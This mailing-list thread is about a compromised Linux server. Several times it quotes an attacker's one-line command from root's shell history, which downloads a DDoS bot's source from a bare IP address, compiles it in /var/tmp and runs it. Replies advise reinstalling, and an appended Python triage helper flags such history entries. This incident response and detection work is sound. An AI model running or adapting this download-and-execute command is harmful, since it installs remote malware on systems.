Gideon,

I checked .bash_history as you suggested and found an interesting entry. This entry was in .bash_history in the 'root' directory.

cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget -O screen.c wget http://64.5.4.47/screen.c;export PATH=.:/usr/bin:$PATH;gcc -o screen screen.c -DEXTERNAL_BASE="\"64.5.4.47\"";screen;exit;

I'm new at this, but based on a little research, am I correct in assuming an external someone downloaded screen.c into my /var/tmp directory, compiled it to /usr/bin and then ran it? Is this correct? I looked at the source for 'screen.c' and in the title it says...

Peer-to-peer UDP Distributed Denial of Service (PUD) by contem

Doesn't look good, does it? Is anyone familiar with this?
On Thu, 2003-04-24 at 15:45, Matt Stamm wrote:
Gideon,
I checked .bash_history as you suggested and found an interesting entry. This entry was in .bash_history in the 'root' directory.
cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget -O screen.c wget http://64.5.4.47/screen.c;export PATH=.:/usr/bin:$PATH;gcc -o screen screen.c -DEXTERNAL_BASE="\"64.5.4.47\"";screen;exit;
I'm new at this, but based on a little research, am I correct in assuming an external someone downloaded screen.c into my /var/tmp directory, compiled it to /usr/bin and then ran it? Is this correct? I looked at the source for 'screen.c' and in the title it says...
Peer-to-peer UDP Distributed Denial of Service (PUD) by contem
Doesn't look good, does it? Is anyone familiar with this?
The IP points to "dailygrind.pciwest.net"
On Apr 24 at 12:45pm, Matt Stamm wrote: [...]
I checked .bash_history as you suggested and found an interesting entry. This entry was in .bash_history in the 'root' directory.
cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget -O screen.c wget http://64.5.4.47/screen.c;export PATH=.:/usr/bin:$PATH;gcc -o screen screen.c -DEXTERNAL_BASE="\"64.5.4.47\"";screen;exit;
I'm new at this, but based on a little research, am I correct in assuming an external someone downloaded screen.c into my /var/tmp directory, compiled it to /usr/bin and then ran it? Is this correct? I looked at the source for 'screen.c' and in the title it says...
Peer-to-peer UDP Distributed Denial of Service (PUD) by contem [...]
Matt,

It appears you're still investigating what happened to your system, and that's fine, but.... I know you've gotten advice from a number of people to the effect that if _part_ of your system has been compromised, then the _whole_ system is suspect, and the only reasonable action is a complete reinstall. It's very good advice. Go ahead and gather all the evidence you want, but save yourself some trouble and future uncertainty and reinstall. Don't try to patch the problem--you'll never know if you got everything.

Jim
The 03.04.24 at 12:45, Matt Stamm wrote:
I checked .bash_history as you suggested and found an interesting entry. This entry was in .bash_history in the 'root' directory.

As somebody else has told you, discontinue using that PC! At least, if you want to investigate it, disconnect it from any network whatsoever. If you want proof, remove the HD, or dump the contents to a CD or whatever using some external OS, like a rescue system on CD. DON'T use that machine as it is! Reformat, and reinstall everything. You can only reuse data files, after inspection. And do it now, please! :-|
Peer-to-peer UDP Distributed Denial of Service (PUD) by contem
Ugh. :-(
Doesn't look good, does it? Is anyone familiar with this?

It has been commented somewhere, that or a similar one. Apparently, your machine is/was used to attack others, IMO.

--
Cheers,
Carlos Robinson
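The history entry Matt quoted, walked through by a small triage helper; this is an added example, not code from the thread or from any of its participants. It splits the ';'-chain in order, tracks the working directory, and flags what the chain actually does on the box: the fetch from a bare IP, the PATH that starts with '.', the compile inside /var/tmp (the binary lands there, not in /usr/bin), and the final 'screen' that runs the freshly built /var/tmp/screen in place of the real command. The sample history lines and the indicator names are constructed for this example.

```python
import re

# Constructed sample: the line Matt found in root's .bash_history, plus one benign line.
SAMPLE_HISTORY = [
    "ls -la /var/log",
    'cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget -O screen.c wget http://64.5.4.47/screen.c;'
    'export PATH=.:/usr/bin:$PATH;gcc -o screen screen.c -DEXTERNAL_BASE="\\"64.5.4.47\\"";screen;exit;',
]

WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")          # staging dirs any user can write to
DOWNLOADERS = ("wget", "curl", "fetch", "lynx")
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\S*")  # URL by IP, no hostname

def split_chain(line):
    """Split a ';'-chained one-liner into its commands (no quote parsing; enough for triage)."""
    return [c.strip() for c in line.split(";") if c.strip()]

def triage_entry(line):
    """Return (indicator, evidence) pairs for one history line, walking the chain in order."""
    findings, cmds = [], split_chain(line)
    cwd, cwd_first_in_path, built = None, False, set()
    if len(cmds) >= 5:
        findings.append(("long_command_chain", f"{len(cmds)} commands chained on one line"))
    for cmd in cmds:
        argv = cmd.split()
        prog = argv[0] if argv else ""
        if prog == "cd" and len(argv) > 1:
            cwd = argv[1]                                  # follow the chain into /var/tmp
        elif prog in DOWNLOADERS:
            m = BARE_IP_URL.search(cmd)
            if m:
                findings.append(("download_from_bare_ip", m.group(0)))
        elif prog == "export" and any(a.startswith("PATH=.:") for a in argv[1:]):
            cwd_first_in_path = True                       # '.' first: cwd binaries shadow /usr/bin
            findings.append(("cwd_first_in_path", cmd))
        elif prog in ("gcc", "cc", "make"):
            if cwd in WORLD_WRITABLE:
                findings.append(("compile_in_world_writable_dir", f"{cmd} (cwd {cwd})"))
            if "-o" in argv:
                built.add(argv[argv.index("-o") + 1])      # output lands in cwd, not /usr/bin
        elif prog in built and cwd_first_in_path:
            findings.append(("ran_freshly_built_binary",
                             f"{cwd or '.'}/{prog} shadows the real '{prog}' command"))
    return findings

def triage_history(lines):
    """Map 1-based line numbers to findings, for lines that have any."""
    return {n: f for n, f in ((i, triage_entry(l)) for i, l in enumerate(lines, 1)) if f}
```

Run triage_history over the lines of a copied .bash_history (taken from a disk image or rescue boot, as Carlos advises, not from the live machine); lines with no findings are omitted from the result.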
participants (4)
- Carlos E. R.
- Jim Cunning
- Ken Schneider
- Matt Stamm